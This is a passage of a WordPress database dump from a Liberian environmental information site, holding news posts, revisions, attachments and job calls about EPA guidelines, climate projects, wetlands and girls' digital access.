wp:paragraph -->\n<p>The Gender Advocate stressed that the message is a wake-up call to everyone, leaders, stakeholders, government officials, citizens, and humanitarians, and without equal access to technology and the internet, girls in Liberia will not participate in the digital world or global village.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"If Liberian girls are not provided the opportunity, it will affect their lives in different ways, it will cripple their voices and stop them from speaking on matters that concern them. Furthermore, if the girls of Liberia are not involved in creating digital tools and online contents, they cannot reach their full potentials and this may affect their future opportunities or space to perform in the job market”. The key note speaker stressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, the Deputy Representative of the United Nations Children Educational Fund, ( UNICEF) to Liberia Amadou Alassane Cisse use the occasion to convey UNICEF’s thanks and appreciations to the Ministry of Gender, Children and Social Protection, the Adolescent Girls Working Group, other sister UN Agencies and development partners for organizing the event.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Cisse indicated that every year October 11 the International Day of Girl Child, UNICEF and partners work to amplify their voices and stand up for girls’ rights.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are reminded of our collective responsibilities as duty bearers to accelerate investment in the digital platform for learning, earning, and connecting people” the UNICEF Deputy Rep indicated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Dr. Ufuoma Omo-Obi, Country Director, PLAN International, also extended Plan International appreciation for the high level of coordination from the Ministry of Gender, Children and Social Protection.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ambassador Obi said with this year’s theme:” Digital Generation, Our Generation and the National Theme: Bridging Digital Gaps for Girls in Liberia, it is meant to support girl and young women around the world to amplify their voices rejecting all gender stereotypes dictating what they can do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that Plan International stands with girls and young women in calling for transformative education to end gender stereotypes, so all children can be themselves and be safe no matter their identity, whether online or in the classrooms.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year\'s International Day of the Girl Child according to the Ministry of Gender, Children and Social Protection was supported by UNICEF, Medica Liberia, Plan International, International Rescue Committee (IRC), United Funding and Development for Underage Mothers (UFDUM), Liberia Association of Psychosocial Services (LAPS) and Defense for Children Liberia.</p>\n<!-- /wp:paragraph -->','Ministry of Gender, Children and Social Protection Celebrates The International Day of the Girl Child','','inherit','closed','closed','','4551-revision-v1','','','2022-01-13 12:20:10','2022-01-13 12:20:10','',4551,'https://ekmsliberia.info/?p=4553',0,'revision','',0),(4556,42,'2022-01-14 12:37:21','2022-01-14 12:37:21','As part of its mandate under Part Il Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibits the importation of chemicals restricted under international conventions to which Liberia is a state party.','EPA\'s GUIDELINES FOR THE IMPORTATION, HANDLING, TRANSPORTATION AND STORAGE OF CHEMICALS IN LIBERIA','','publish','closed','closed','','epas-chemical-guideline-for-importation-handling-transportation-and-storage-of-chemicals','','','2023-03-18 06:18:09','2023-03-18 06:18:09','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4556',64,'document','',0),(4557,42,'2022-01-14 12:35:29','2022-01-14 12:35:29','','Chemical Guideline','','inherit','open','closed','','screenshot-63','','','2022-01-14 12:35:42','2022-01-14 12:35:42','',4556,'https://ekmsliberia.info/wp-content/uploads/2022/01/Screenshot-63.png',0,'attachment','image/png',0),(4558,42,'2022-01-14 12:36:05','2022-01-14 12:36:05','','Chemical Guideline Ready for Website','','inherit','open','closed','','chemical-guideline-ready-for-website','','','2022-01-14 12:36:05','2022-01-14 12:36:05','',4556,'https://ekmsliberia.info/wp-content/uploads/2022/01/Chemical-Guideline-Ready-for-Website.pdf',0,'attachment','application/pdf',0),(4559,42,'2022-01-14 12:37:21','2022-01-14 12:37:21','As part of its mandate under Part Il Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibits the importation of chemicals restricted under international conventions to which Liberia is a state party.','EPA\'s Chemical Guideline for Importation, Handling, Transportation, and Storage of Chemicals','','inherit','closed','closed','','4556-revision-v1','','','2022-01-14 12:37:21','2022-01-14 12:37:21','',4556,'https://ekmsliberia.info/?p=4559',0,'revision','',0),(4561,42,'2022-01-25 21:28:40','2022-01-25 21:28:40','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project: (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project.  The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/01/Final-ToR-CIS.-Proj.-Coord4131.pdf\">Project Coordinator Wanted</a></em>','Call for Expression of Interest - Project Coordinator for CIS Project','','publish','closed','closed','','call-for-expression-of-interest-to-provide-project-management-support-to-the-enhancing-climate-information-system-for-resilient-development-in-liberia-cis-project','','','2022-03-18 13:46:36','2022-03-18 13:46:36','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4561',95,'ekms_bulletin','',0),(4562,42,'2022-01-25 21:28:21','2022-01-25 21:28:21','','Final ToR- CIS. Proj. Coord[4131]','','inherit','open','closed','','final-tor-cis-proj-coord4131','','','2022-01-25 21:28:21','2022-01-25 21:28:21','',0,'https://ekmsliberia.info/wp-content/uploads/2022/01/Final-ToR-CIS.-Proj.-Coord4131.pdf',0,'attachment','application/pdf',0),(4563,42,'2022-01-25 21:28:40','2022-01-25 21:28:40','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project: (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project.  The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.','Call for Expression of Interest To Provide Project Management Support to the Enhancing Climate Information System for Resilient Development in Liberia (CIS) Project','','inherit','closed','closed','','4561-revision-v1','','','2022-01-25 21:28:40','2022-01-25 21:28:40','',4561,'https://ekmsliberia.info/?p=4563',0,'revision','',0),(4566,42,'2022-02-03 09:35:00','2022-02-03 09:35:00','<!-- wp:paragraph -->\n<p>The Liberian Government through the Environmental Protection Agency (EPA) will on 02 February 2021 join countries across the world to celebrate ‘World Wetlands Day’ in Kpatawee, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>February 2 is observed and celebrated annually as World Wetlands Day. The day was adopted through an inter-governmental treaty, known as the Ramsar Convention to raise awareness on the protection and sustainable use of wetlands generally and Ramsar Sites specifically in 1971 in the Iranian City of Ramsar.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year’s celebration is expected to be held under the theme: “Wetland Action for People and Nature”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President of Liberia, H.E. Dr. George Manneh Weah is expected to grace the occasion and make policy statement on wetlands protection and management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a gathering of world leaders at the 26<sup>th</sup> Conference of the Parties (COP26) in Glasgow, the United Kingdom on November 1, 2021, President Weah designated Liberia’s forest and wetlands as the ‘third lung’ of the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wetlands serve as a major natural infrastructure for carbon sequestration and breeding grounds for fish and natural filtration for groundwater. It also helps prevent flooding and coastal erosion because they are a giant sponge that absorb water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Weah is a staunch campaigner for environmental protection and governance and was instrumental in the organization of a national climate change and environmental conference since the United States of America made a decision to rejoin the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His Excellency Urban Sjostrom, Ambassador of the Kingdom of Sweden near Monrovia is expected to serve as Keynote Speaker at the occasion, which is expected to attract residents and students from several high schools in Bong County.</p>\n<!-- /wp:paragraph -->','Liberia Celebrates World Wetlands Wednesday','','publish','closed','closed','','liberia-celebrates-world-wetlands-wednesday','','','2022-02-08 13:37:30','2022-02-08 13:37:30','',0,'https://ekmsliberia.info/?p=4566',142,'post','',0),(4567,42,'2022-02-08 13:36:48','2022-02-08 13:36:48','','world wetland day','','inherit','open','closed','','world-wetland-day','','','2022-02-08 13:36:48','2022-02-08 13:36:48','',4566,'https://ekmsliberia.info/wp-content/uploads/2022/02/world-wetland-day.png',0,'attachment','image/png',0),(4568,42,'2022-02-08 13:37:29','2022-02-08 13:37:29','<!-- wp:paragraph -->\n<p>The Liberian Government through the Environmental Protection Agency (EPA) will on 02 February 2021 join countries across the world to celebrate ‘World Wetlands Day’ in Kpatawee, Bong County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>February 2 is observed and celebrated annually as World Wetlands Day. The day was adopted through an inter-governmental treaty, known as the Ramsar Convention to raise awareness on the protection and sustainable use of wetlands generally and Ramsar Sites specifically in 1971 in the Iranian City of Ramsar.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This year’s celebration is expected to be held under the theme: “Wetland Action for People and Nature”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President of Liberia, H.E. Dr. George Manneh Weah is expected to grace the occasion and make policy statement on wetlands protection and management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a gathering of world leaders at the 26<sup>th</sup> Conference of the Parties (COP26) in Glasgow, the United Kingdom on November 1, 2021, President Weah designated Liberia’s forest and wetlands as the ‘third lung’ of the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wetlands serve as a major natural infrastructure for carbon sequestration and breeding grounds for fish and natural filtration for groundwater. It also helps prevent flooding and coastal erosion because they are a giant sponge that absorb water.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Weah is a staunch campaigner for environmental protection and governance and was instrumental in the organization of a national climate change and environmental conference since the United States of America made a decision to rejoin the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His Excellency Urban Sjostrom, Ambassador of the Kingdom of Sweden near Monrovia is expected to serve as Keynote Speaker at the occasion, which is expected to attract residents and students from several high schools in Bong County.</p>\n<!-- /wp:paragraph -->','Liberia Celebrates World Wetlands Wednesday','','inherit','closed','closed','','4566-revision-v1','','','2022-02-08 13:37:29','2022-02-08 13:37:29','',4566,'https://ekmsliberia.info/?p=4568',0,'revision','',0),(4569,42,'2022-02-08 13:45:42','2022-02-08 13:45:42','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning18 through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/Financial-Management-Specialist-.pdf\" target=\"_blank\" rel=\"noopener\">Financial Management Specialist Wanted</a></em>','Call for Expression of Interest - Financial Management Specialist for CIS Project','','publish','closed','closed','','call-for-expression-of-interest-to-provide-financial-management-support-to-the-enhancing-climate-information-system-for-resilient-development-in-liberia-cis','','','2022-03-18 13:43:53','2022-03-18 13:43:53','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4569',94,'ekms_bulletin','',0),(4570,42,'2022-02-08 13:45:22','2022-02-08 13:45:22','','Financial Management Specialist','','inherit','open','closed','','financial-management-specialist','','','2022-02-08 13:45:22','2022-02-08 13:45:22','',0,'https://ekmsliberia.info/wp-content/uploads/2022/02/Financial-Management-Specialist-.pdf',0,'attachment','application/pdf',0),(4571,42,'2022-02-08 13:45:42','2022-02-08 13:45:42','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning18 through effective climate information systems.','Call for Expression of Interest - To Provide Financial Management Support to the Enhancing Climate  Information System for Resilient Development in Liberia (CIS)','','inherit','closed','closed','','4569-revision-v1','','','2022-02-08 13:45:42','2022-02-08 13:45:42','',4569,'https://ekmsliberia.info/?p=4571',0,'revision','',0),(4572,42,'2022-02-08 13:45:51','2022-02-08 13:45:51','','Hydrology Specialist','','inherit','open','closed','','hydrology-specialist','','','2022-02-08 13:45:51','2022-02-08 13:45:51','',0,'https://ekmsliberia.info/wp-content/uploads/2022/02/Hydrology-Specialist-.pdf',0,'attachment','application/pdf',0),(4573,42,'2022-02-08 13:48:21','2022-02-08 13:48:21','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/Hydrology-Specialist-.pdf\" target=\"_blank\" rel=\"noopener\">Hydrology Specialist Wanted</a></em>','Call for Expression of Interest - Hydrology Specialist for CIS Project','','publish','closed','closed','','call-for-expression-of-interest-to-provide-technical-support-to-the-enhancing-climate-information-system-for-resilient-development-in-liberia-cis','','','2022-03-18 13:41:31','2022-03-18 13:41:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4573',93,'ekms_bulletin','',0),(4574,42,'2022-02-08 13:47:55','2022-02-08 13:47:55','','M & E Specialist','','inherit','open','closed','','m-e-specialist','','','2022-02-08 13:47:55','2022-02-08 13:47:55','',0,'https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf',0,'attachment','application/pdf',0),(4575,42,'2022-02-08 13:48:21','2022-02-08 13:48:21','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.','Call for Expression of Interest - To Provide Technical Support to the Enhancing Climate Information  System for Resilient Development in Liberia (CIS)','','inherit','closed','closed','','4573-revision-v1','','','2022-02-08 13:48:21','2022-02-08 13:48:21','',4573,'https://ekmsliberia.info/?p=4575',0,'revision','',0),(4576,42,'2022-02-08 13:49:38','2022-02-08 13:49:38','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf\" target=\"_blank\" rel=\"noopener\">M &amp; E Specialist Wanted</a></em>','Call for Expression of Interest - Monitoring & Evaluation Specialist for CIS Project','','publish','closed','closed','','call-for-expression-of-interest-to-provide-technical-support-to-the-enhancing-climate-information-system-for-resilient-development-in-liberia-cis-2','','','2022-03-18 13:39:46','2022-03-18 13:39:46','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4576',92,'ekms_bulletin','',0),(4577,42,'2022-02-08 13:49:38','2022-02-08 13:49:38','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.','Call for Expression of Interest - To Provide Technical Support to the Enhancing Climate Information  System for Resilient Development in Liberia (CIS','','inherit','closed','closed','','4576-revision-v1','','','2022-02-08 13:49:38','2022-02-08 13:49:38','',4576,'https://ekmsliberia.info/?p=4577',0,'revision','',0),(4579,1,'2022-02-16 12:51:26','2022-02-16 12:51:26','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2022-02-16 12:51:26','2022-02-16 12:51:26','',3901,'https://ekmsliberia.info/?p=4579',0,'revision','',0),(4580,1,'2022-02-16 12:52:29','2022-02-16 12:52:29','','Institutions-single-post','','inherit','closed','closed','','3901-autosave-v1','','','2022-02-16 12:52:29','2022-02-16 12:52:29','',3901,'https://ekmsliberia.info/?p=4580',0,'revision','',0),(4582,42,'2022-02-25 16:15:13','2022-02-25 16:15:13','<!-- wp:paragraph -->\n<p>Considering that awareness is a cardinal part of the work being done at the Environmental Protection Agency of Liberia, a team of awareness officers in the Department of Inter-Sectorial Coordination intensified its engagement with several communities where mangrove forests are being illegally harvested in violation to the Environmental Protection Management Law of Liberia.<br>In one of the communities, Tyler Island residents asked the EPA to empower community leaders through a written instrument to arrest people illegally building in the Mesurado Wetland thus destroying the mangrove forest.<br>At Voker Mission in Paynesville and Cotton tree Baptist Seminary, residents were educated about the danger of destroying the wetlands and the mangrove forests. They were cautioned against dumping wastes in the environment and the danger plastic poses on the environment. Construction in wetlands and damming of waterways were also talked about during the discussions with local residents.<br>It is everyone\'s hope that the Agency will empower and properly equip its team of technicians and awareness officers and the leadership of communities to carry-out effective awareness for a sustainable management and protection of the environment.</p>\n<!-- /wp:paragraph -->','Department of Inter-Sectorial Coordination at EPA Engages Communities About Illegal Mangrove Harvesting','','publish','closed','closed','','department-of-inter-sectorial-coordination-at-epa-engages-communities-about-illegal-mangrove-harvesting','','','2022-02-25 16:15:47','2022-02-25 16:15:47','',0,'https://ekmsliberia.info/?p=4582',141,'post','',0),(4583,42,'2022-02-25 16:01:11','2022-02-25 16:01:11','','news','','inherit','open','closed','','news-2','','','2022-02-25 16:01:11','2022-02-25 16:01:11','',4582,'https://ekmsliberia.info/wp-content/uploads/2022/02/news.jpg',0,'attachment','image/jpeg',0),(4584,42,'2022-02-25 16:15:13','2022-02-25 16:15:13','<!-- wp:paragraph -->\n<p>Considering that awareness is a cardinal part of the work being done at the Environmental Protection Agency of Liberia, a team of awareness officers in the Department of Inter-Sectorial Coordination intensified its engagement with several communities where mangrove forests are being illegally harvested in violation to the Environmental Protection Management Law of Liberia.<br>In one of the communities, Tyler Island residents asked the EPA to empower community leaders through a written instrument to arrest people illegally building in the Mesurado Wetland thus destroying the mangrove forest.<br>At Voker Mission in Paynesville and Cotton tree Baptist Seminary, residents were educated about the danger of destroying the wetlands and the mangrove forests. They were cautioned against dumping wastes in the environment and the danger plastic poses on the environment. Construction in wetlands and damming of waterways were also talked about during the discussions with local residents.<br>It is everyone\'s hope that the Agency will empower and properly equip its team of technicians and awareness officers and the leadership of communities to carry-out effective awareness for a sustainable management and protection of the environment.</p>\n<!-- /wp:paragraph -->','Department of Inter-Sectorial Coordination at EPA Engages Communities About Illegal Mangrove Harvesting','','inherit','closed','closed','','4582-revision-v1','','','2022-02-25 16:15:13','2022-02-25 16:15:13','',4582,'https://ekmsliberia.info/?p=4584',0,'revision','',0),(4586,42,'2022-03-10 11:08:21','2022-03-10 11:08:21','','Liberia Census 2022','','publish','closed','closed','','liberia-census-2022','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=4586',3,'nav_menu_item','',0),(4587,42,'2022-03-17 13:44:56','2022-03-17 13:44:56','<span id=\"page27R_mcid1\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The EPA, in fulfillment of its statutory mandate to protect and manage the environment of Liberia </span><span dir=\"ltr\" role=\"presentation\">increased robustly its inspection and monitoring of the environment of Liberia during the year </span><span dir=\"ltr\" role=\"presentation\">under review as a result of</span> <span dir=\"ltr\" role=\"presentation\">nume</span><span dir=\"ltr\" role=\"presentation\">rous complaints received from</span> <span dir=\"ltr\" role=\"presentation\">t</span><span dir=\"ltr\" role=\"presentation\">he Liberia citizenry</span><span dir=\"ltr\" role=\"presentation\">, especially in </span><span dir=\"ltr\" role=\"presentation\">the urban communities</span> <span dir=\"ltr\" role=\"presentation\">ranging from degradation of the wetlands, water pollution, wildlife </span><span dir=\"ltr\" role=\"presentation\">poaching, illicit artisanal mining, beach sand mining etc. The inspection and monitoring exercise </span><span dir=\"ltr\" role=\"presentation\">also extended to major industria</span><span dir=\"ltr\" role=\"presentation\">l activities namely mining, rubber processing plants, steel, cement, </span><span dir=\"ltr\" role=\"presentation\">breweries, and oil palm plantation.</span> <span dir=\"ltr\" role=\"presentation\">In the effort to buttress environmental monitoring, the EPA has </span><span dir=\"ltr\" role=\"presentation\">also established a new unit called the Environmental Research Radiation Safety to deal </span><span dir=\"ltr\" role=\"presentation\">with issues </span><span dir=\"ltr\" role=\"presentation\">of radiation sources and infrastructures in the country and conducted 10 days’ radiation safety </span><span dir=\"ltr\" role=\"presentation\">training of technicians of the Agency by extended experts.</span></span>','EPA Annual Report 2021','','publish','closed','closed','','epa-annual-report-2021','','','2022-03-17 13:44:56','2022-03-17 13:44:56','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4587',63,'document','',0),(4588,42,'2022-03-17 13:43:36','2022-03-17 13:43:36','','Screenshot 2022-03-17 at 13-33-09 EPA 2021 ANNUAL REPORT.pdf','','inherit','open','closed','','screenshot-2022-03-17-at-13-33-09-epa-2021-annual-report-pdf','','','2022-03-17 13:43:36','2022-03-17 13:43:36','',4587,'https://ekmsliberia.info/wp-content/uploads/2022/03/Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf.png',0,'attachment','image/png',0),(4589,42,'2022-03-17 13:44:18','2022-03-17 13:44:18','','EPA 2021 ANNUAL REPORT','','inherit','open','closed','','epa-2021-annual-report','','','2022-03-17 13:44:18','2022-03-17 13:44:18','',4587,'https://ekmsliberia.info/wp-content/uploads/2022/03/EPA-2021-ANNUAL-REPORT.pdf',0,'attachment','application/pdf',0),(4590,42,'2022-03-17 13:44:56','2022-03-17 13:44:56','<span id=\"page27R_mcid1\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The EPA, in fulfillment of its statutory mandate to protect and manage the environment of Liberia </span><span dir=\"ltr\" role=\"presentation\">increased robustly its inspection and monitoring of the environment of Liberia during the year </span><span dir=\"ltr\" role=\"presentation\">under review as a result of</span> <span dir=\"ltr\" role=\"presentation\">nume</span><span dir=\"ltr\" role=\"presentation\">rous complaints received from</span> <span dir=\"ltr\" role=\"presentation\">t</span><span dir=\"ltr\" role=\"presentation\">he Liberia citizenry</span><span dir=\"ltr\" role=\"presentation\">, especially in </span><span dir=\"ltr\" role=\"presentation\">the urban communities</span> <span dir=\"ltr\" role=\"presentation\">ranging from degradation of the wetlands, water pollution, wildlife </span><span dir=\"ltr\" role=\"presentation\">poaching, illicit artisanal mining, beach sand mining etc. The inspection and monitoring exercise </span><span dir=\"ltr\" role=\"presentation\">also extended to major industria</span><span dir=\"ltr\" role=\"presentation\">l activities namely mining, rubber processing plants, steel, cement, </span><span dir=\"ltr\" role=\"presentation\">breweries, and oil palm plantation.</span> <span dir=\"ltr\" role=\"presentation\">In the effort to buttress environmental monitoring, the EPA has </span><span dir=\"ltr\" role=\"presentation\">also established a new unit called the Environmental Research Radiation Safety to deal </span><span dir=\"ltr\" role=\"presentation\">with issues </span><span dir=\"ltr\" role=\"presentation\">of radiation sources and infrastructures in the country and conducted 10 days’ radiation safety </span><span dir=\"ltr\" role=\"presentation\">training of technicians of the Agency by extended experts.</span></span>','EPA Annual Report 2021','','inherit','closed','closed','','4587-revision-v1','','','2022-03-17 13:44:56','2022-03-17 13:44:56','',4587,'https://ekmsliberia.info/?p=4590',0,'revision','',0),(4591,42,'2022-03-17 13:49:18','2022-03-17 13:49:18','','EPA Consolidated Annual Report 2022','','publish','closed','closed','','epa-consolidated-annual-report-2022','','','2022-03-17 13:49:18','2022-03-17 13:49:18','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4591',62,'document','',0),(4592,42,'2022-03-17 13:47:57','2022-03-17 13:47:57','','Screenshot 2022-03-17 at 13-30-50 EPA 2022 Consolidated Annual Work Plan.pdf','','inherit','open','closed','','screenshot-2022-03-17-at-13-30-50-epa-2022-consolidated-annual-work-plan-pdf','','','2022-03-17 13:47:57','2022-03-17 13:47:57','',4591,'https://ekmsliberia.info/wp-content/uploads/2022/03/Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf.png',0,'attachment','image/png',0),(4593,42,'2022-03-17 13:48:50','2022-03-17 13:48:50','','EPA 2022 Consolidated Annual Work Plan','','inherit','open','closed','','epa-2022-consolidated-annual-work-plan','','','2022-03-17 13:48:50','2022-03-17 13:48:50','',4591,'https://ekmsliberia.info/wp-content/uploads/2022/03/EPA-2022-Consolidated-Annual-Work-Plan.pdf',0,'attachment','application/pdf',0),(4594,42,'2022-03-17 13:49:18','2022-03-17 13:49:18','','EPA Consolidated Annual Report 2022','','inherit','closed','closed','','4591-revision-v1','','','2022-03-17 13:49:18','2022-03-17 13:49:18','',4591,'https://ekmsliberia.info/?p=4594',0,'revision','',0),(4596,42,'2022-03-18 13:38:39','2022-03-18 13:38:39','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\n\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','Call for Expression of Interest - Monitoring & Evaluation Specialist for','','inherit','closed','closed','','4576-autosave-v1','','','2022-03-18 13:38:39','2022-03-18 13:38:39','',4576,'https://ekmsliberia.info/?p=4596',0,'revision','',0),(4597,42,'2022-03-18 13:37:27','2022-03-18 13:37:27','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf\" target=\"_blank\" rel=\"noopener\">Expression of Interest</a></em>','Call for Expression of Interest - To Provide Technical Support to the Enhancing Climate Information System for Resilient Development in Liberia (CIS','','inherit','closed','closed','','4576-revision-v1','','','2022-03-18 13:37:27','2022-03-18 13:37:27','',4576,'https://ekmsliberia.info/?p=4597',0,'revision','',0),(4598,42,'2022-03-18 13:39:46','2022-03-18 13:39:46','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental 